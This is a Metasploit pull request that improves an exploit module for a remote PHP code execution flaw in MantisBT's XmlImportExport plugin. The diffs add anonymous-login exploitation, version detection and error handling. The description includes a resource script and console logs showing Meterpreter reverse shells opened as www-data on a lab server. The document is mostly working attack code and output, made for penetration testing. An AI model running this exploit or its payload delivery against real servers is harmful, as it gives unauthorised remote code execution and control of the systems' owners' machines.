### PR TITLE
some improvements to the mantis module

### DIFF
--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -17,16 +17,22 @@ class Metasploit3 < Msf::Exploit::Remote
         This module exploits a post-auth vulnerability found in MantisBT versions 1.2.0a3 up to 1.2.17 when the Import/Export plugin is installed.
         The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
         This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
+        This version also suffers from another issue. The import page is not checking the correct user level
+        of the user, so it's possible to exploit this issue with any user.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
         [
           'Egidio Romano', # discovery http://karmainsecurity.com
           'Juan Escobar <eng.jescobar[at]gmail.com>', # module development @itsecurityco
+          'Christian Mehlmauer'
         ],
       'References'     =>
         [
-          ['CVE', '2014-7146']
+          ['CVE', '2014-7146'],
+          ['CVE', '2014-8598'],
+          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17725'],
+          ['URL', 'https://www.mantisbt.org/bugs/view.php?id=17780']
         ],
       'Platform'       => 'php',
       'Arch'           => ARCH_PHP,
@@ -203,7 +209,12 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'    => data_post
     }, timeout)
 
-    # request above will time out and return nil
+    if res and res.body =~ /APPLICATION ERROR/
+      print_error('Error on uploading XML')
+      return false
+    end
+
+    # request above will time out and return nil on success
     return true
   end
 

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
         The vulnerable code exists on plugins/XmlImportExport/ImportXml.php, which receives user input through the "description" field and the "issuelink" attribute of an uploaded XML file and passes to preg_replace() function with the /e modifier.
         This allows a remote authenticated attacker to execute arbitrary PHP code on the remote machine.
         This version also suffers from another issue. The import page is not checking the correct user level
-        of the user, so it's possible to exploit this issue with any user.
+        of the user, so it's possible to exploit this issue with any user including the anonymous one if enabled.
       },
       'License'        => MSF_LICENSE,
       'Author'         =>
@@ -59,38 +59,44 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def do_login()
-    print_status('Checking access to MantisBT...')
+    # check for anonymous login
     res = send_request_cgi({
       'method'   => 'GET',
-      'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
-      'vars_get' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
-      }
+      'uri'      => normalize_uri(target_uri.path, 'login_anon.php')
     })
+    # if the redirect contains a username (non empty), anonymous access is enabled
+    if res && res.redirect? && res.redirection && res.redirection.query =~ /username=[^&]+/
+      print_status('Anonymous access enabled, no need to log in')
+      session_cookie = res.get_cookies
+    else
+      res = send_request_cgi({
+        'method'   => 'GET',
+        'uri'      => normalize_uri(target_uri.path, 'login_page.php'),
+        'vars_get' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import')
+        }
+      })
+      session_cookie = res.get_cookies
+      print_status('Logging in...')
+      res = send_request_cgi({
+        'method'    => 'POST',
+        'uri'       => normalize_uri(target_uri.path, 'login.php'),
+        'cookie'    => session_cookie,
+        'vars_post' => {
+          'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
+          'username' => datastore['username'],
+          'password' => datastore['password'],
+          'secure_session' => 'on'
+        }
+      })
+      fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
 
-    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && res.code == 200
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
 
-    session_cookie = res.get_cookies
+      session_cookie = "#{session_cookie} #{res.get_cookies}"
+    end
 
-    print_status('Logging in...')
-    res = send_request_cgi({
-      'method'    => 'POST',
-      'uri'       => normalize_uri(target_uri.path, 'login.php'),
-      'cookie'    => session_cookie,
-      'vars_post' => {
-        'return'  => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import'),
-        'username' => datastore['username'],
-        'password' => datastore['password'],
-        'secure_session' => 'on'
-      }
-    })
-
-
-    fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
-
-    fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
-
-    "#{session_cookie} #{res.get_cookies}"
+    session_cookie
   end
 
   def upload_xml(payload_b64, rand_text, cookies, is_check)
@@ -219,6 +225,13 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exec_php(php_code, is_check = false)
+    print_status('Checking access to MantisBT...')
+    res = send_request_cgi({
+      'method'   => 'GET',
+      'uri'      => normalize_uri(target_uri.path)
+    })
+
+    fail_with(Failure::NoAccess, 'Error accessing MantisBT') unless res && (res.code == 200 || res.redirection)
 
     # remove comments, line breaks and spaces of php_code
     payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -9,6 +9,7 @@ class Metasploit3 < Msf::Exploit::Remote
   Rank = GreatRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include REXML
 
   def initialize(info = {})
     super(update_info(info,
@@ -48,13 +49,56 @@ class Metasploit3 < Msf::Exploit::Remote
       ], self.class)
   end
 
-  def check
-    res = exec_php('phpinfo(); die();', true)
+  def get_mantis_version
+    xml = Document.new
+    xml.add_element(
+    "soapenv:Envelope",
+    {
+      'xmlns:xsi'     => "http://www.w3.org/2001/XMLSchema-instance",
+      'xmlns:xsd'     => "http://www.w3.org/2001/XMLSchema",
+      'xmlns:soapenv' => "http://schemas.xmlsoap.org/soap/envelope/",
+      'xmlns:man'     => "http://futureware.biz/mantisconnect"
+    })
+    xml.root.add_element("soapenv:Header")
+    xml.root.add_element("soapenv:Body")
+    body = xml.root.elements[2]
+    body.add_element("man:mc_version",
+      { 'soapenv:encodingStyle' => "http://schemas.xmlsoap.org/soap/encoding/" }
+    )
 
-    if res && res.body && res.body.include?('This program makes use of the Zend')
-      return Exploit::CheckCode::Vulnerable
+    res = send_request_cgi({
+      'method'   => 'POST',
+      'uri'      => normalize_uri(target_uri.path, 'api', 'soap', 'mantisconnect.php'),
+      'ctype'    => 'text/xml; charset=UTF-8',
+      'headers'  => { 'SOAPAction' => 'http://www.mantisbt.org/bugs/api/soap/mantisconnect.php/mc_version'},
+      'data'     => xml.to_s
+    })
+    if res && res.code == 200
+      match = res.body.match(/<ns1:mc_versionResponse><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
+      if match && match.length == 2
+        version = match[1]
+        print_status("Detected Mantis version #{version}")
+        return version
+      end
+    end
+
+    print_status("Can not detect Mantis version")
+    return nil
+  end
+
+  def check
+    version = get_mantis_version
+
+    return Exploit::CheckCode::Unknown if version.nil?
+
+    gem_version = Gem::Version.new(version)
+    gem_version_introduced = Gem::Version.new('1.2.0a3')
+    gem_version_fixed = Gem::Version.new('1.2.18')
+
+    if gem_version < gem_version_fixed && gem_version >= gem_version_introduced
+      return Msf::Exploit::CheckCode::Appears
     else
-      return Exploit::CheckCode::Unknown
+      return Msf::Exploit::CheckCode::Safe
     end
   end
 
@@ -317,6 +361,7 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def exploit
+    get_mantis_version
     unless exec_php(payload.encoded)
       fail_with(Failure::Unknown, 'Exploit failed, aborting.')
     end

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -112,6 +112,11 @@ class Metasploit3 < Msf::Exploit::Remote
       return false
     end
 
+    if res.body =~ /Plugin is not registered with MantisBT/i
+      print_error('XMLImportExport plugin is not installed')
+      return false
+    end
+
     # Retrieving CSRF token
     if res.body =~ /name="plugin_xml_import_action_token" value="(.*)"/
       csrf_token = Regexp.last_match[1]
@@ -190,13 +195,16 @@ class Metasploit3 < Msf::Exploit::Remote
     data_post = data.to_s
 
     print_status('Sending payload...')
-    return send_request_cgi({
+    res = send_request_cgi({
       'method'  => 'POST',
       'uri'     => normalize_uri(target_uri.path, 'plugin.php?page=XmlImportExport/import_action'),
       'cookie' => cookies,
       'ctype'   => "multipart/form-data; boundary=#{ data.bound }",
       'data'    => data_post
     }, timeout)
+
+    # request above will time out and return nil
+    return true
   end
 
   def exec_php(php_code, is_check = false)
@@ -215,6 +223,8 @@ class Metasploit3 < Msf::Exploit::Remote
     cookies = do_login()
 
     res_payload = upload_xml(payload_b64, rand_text, cookies, is_check)
+
+    return unless res_payload
 
     # When a meterpreter session is active, communication with the application is lost.
     # Must login again in order to recover the communication. Thanks to @FireFart for figure out how to fix it.

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -215,7 +215,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'    => data_post
     }, timeout)
 
-    if res and res.body =~ /APPLICATION ERROR/
+    if res && res.body && res.body.include?('APPLICATION ERROR')
       print_error('Error on uploading XML')
       return false
     end

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
 
-      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && res.redirection.to_s.include?('login_page.php')
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && !res.redirection.to_s.include?('login_page.php')
 
       session_cookie = "#{session_cookie} #{res.get_cookies}"
     end

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -74,7 +74,7 @@ class Metasploit3 < Msf::Exploit::Remote
       'data'     => xml.to_s
     })
     if res && res.code == 200
-      match = res.body.match(/<ns1:mc_versionResponse><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
+      match = res.body.match(/<ns1:mc_versionResponse.*><return xsi:type="xsd:string">(.+)<\/return><\/ns1:mc_versionResponse>/)
       if match && match.length == 2
         version = match[1]
         print_status("Detected Mantis version #{version}")

--- a/modules/exploits/multi/http/mantisbt_php_exec.rb
+++ b/modules/exploits/multi/http/mantisbt_php_exec.rb
@@ -51,7 +51,7 @@ class Metasploit3 < Msf::Exploit::Remote
   def check
     res = exec_php('phpinfo(); die();', true)
 
-    if res && res.body =~ /This program makes use of the Zend/
+    if res && res.body && res.body.include?('This program makes use of the Zend')
       return Exploit::CheckCode::Vulnerable
     else
       return Exploit::CheckCode::Unknown
@@ -91,7 +91,7 @@ class Metasploit3 < Msf::Exploit::Remote
       })
       fail_with(Failure::NoAccess, 'Login failed') unless res && res.code == 302
 
-      fail_with(Failure::NoAccess, 'Wrong credentials') unless res.redirection.to_s !~ /login_page.php/
+      fail_with(Failure::NoAccess, 'Wrong credentials') unless res && res.redirection.to_s.include?('login_page.php')
 
       session_cookie = "#{session_cookie} #{res.get_cookies}"
     end
@@ -119,12 +119,12 @@ class Metasploit3 < Msf::Exploit::Remote
       }
     })
 
-    unless res && res.code == 200
+    unless res && res.code == 200 && res.body
       print_error('Error trying to access XmlImportExport/import page...')
       return false
     end
 
-    if res.body =~ /Plugin is not registered with MantisBT/i
+    if res.body.include?('Plugin is not registered with MantisBT')
       print_error('XMLImportExport plugin is not installed')
       return false
     end
@@ -237,7 +237,7 @@ class Metasploit3 < Msf::Exploit::Remote
     payload_clean = php_code.gsub(/(\s+)|(#.*)/, '')
 
     # clean b64 payload
-    while Rex::Text.encode_base64(payload_clean) =~ /=/
+    while Rex::Text.encode_base64(payload_clean).include?('=')
       payload_clean = "#{ payload_clean } "
     end
     payload_b64 = Rex::Text.encode_base64(payload_clean)


### PR DESCRIPTION
This PR adds some improvements to the mantis module (see #4527)

mantis.rc file:

```
use exploit/multi/http/mantisbt_php_exec
set RHOST 10.211.55.55
set targeturi /mantisbt-1.2.15
exploit -z
set targeturi /mantisbt-1.2.16
exploit -z
set targeturi /mantisbt-1.2.17
exploit -z
```

Output:

```
[*] Processing mantis.rc for ERB directives.
resource (mantis.rc)> use exploit/multi/http/mantisbt_php_exec
resource (mantis.rc)> set RHOST 10.211.55.55
RHOST => 10.211.55.55
resource (mantis.rc)> set targeturi /mantisbt-1.2.15
targeturi => /mantisbt-1.2.15
resource (mantis.rc)> exploit -z
[*] Started reverse handler on 10.211.55.2:4444
[*] Checking access to MantisBT...
[*] Logging in...
[*] Checking XmlImportExport plugin...
[*] Sending payload...
[*] Sending stage (40499 bytes) to 10.211.55.55
[*] Meterpreter session 1 opened (10.211.55.2:4444 -> 10.211.55.55:56621) at 2015-01-06 11:31:36 +0100
[*] Checking access to MantisBT...
[*] Logging in...
[*] Deleting issue (CMOiS)...
[*] Issue number (10) removed
[*] Session 1 created in the background.
resource (mantis.rc)> set targeturi /mantisbt-1.2.16
targeturi => /mantisbt-1.2.16
resource (mantis.rc)> exploit -z
[*] Started reverse handler on 10.211.55.2:4444
[*] Checking access to MantisBT...
[*] Logging in...
[*] Checking XmlImportExport plugin...
[*] Sending payload...
[*] Sending stage (40499 bytes) to 10.211.55.55
[*] Meterpreter session 2 opened (10.211.55.2:4444 -> 10.211.55.55:56622) at 2015-01-06 11:31:41 +0100
[*] Checking access to MantisBT...
[*] Logging in...
[*] Deleting issue (VzoTT)...
[*] Issue number (5) removed
[*] Session 2 created in the background.
resource (mantis.rc)> set targeturi /mantisbt-1.2.17
targeturi => /mantisbt-1.2.17
resource (mantis.rc)> exploit -z
[*] Started reverse handler on 10.211.55.2:4444
[*] Checking access to MantisBT...
[*] Logging in...
[*] Checking XmlImportExport plugin...
[*] Sending payload...
[*] Sending stage (40499 bytes) to 10.211.55.55
[*] Meterpreter session 3 opened (10.211.55.2:4444 -> 10.211.55.55:56624) at 2015-01-06 11:31:44 +0100
[*] Checking access to MantisBT...
[*] Logging in...
[*] Deleting issue (svdhU)...
[*] Issue number (3) removed
[*] Session 3 created in the background.
msf exploit(mantisbt_php_exec) > sessions -l

Active sessions
===============

  Id  Type                 Information                 Connection
  --  ----                 -----------                 ----------
  1   meterpreter php/php  www-data (33) @ metasploit  10.211.55.2:4444 -> 10.211.55.55:56621 (10.211.55.55)
  2   meterpreter php/php  www-data (33) @ metasploit  10.211.55.2:4444 -> 10.211.55.55:56622 (10.211.55.55)
  3   meterpreter php/php  www-data (33) @ metasploit  10.211.55.2:4444 -> 10.211.55.55:56624 (10.211.55.55)

msf exploit(mantisbt_php_exec) >
```
